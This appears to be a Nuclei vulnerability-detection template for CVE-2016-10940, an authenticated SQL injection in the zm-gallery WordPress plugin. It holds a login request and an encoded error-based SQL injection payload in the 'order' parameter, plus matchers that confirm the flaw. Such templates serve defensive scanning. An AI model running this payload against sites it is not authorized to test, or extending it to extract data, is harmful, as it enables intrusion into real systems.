id: CVE-2016-10940 info: name: The zm-gallery plugin 1.0 for WordPress SQLI author: cckuailong severity: high description: The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc%2CEXTRACTVALUE%283991%2CCONCAT%280x5c%2C0x7170707671%2C%28SELECT+%28ELT%283991%3D3991%2C1%29%29%29%2C0x7178717671%29%29 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "ZM Gallery Plugin" - "XPATH syntax error" - "EXTRACTVALUE(" condition: and - type: status status: - 200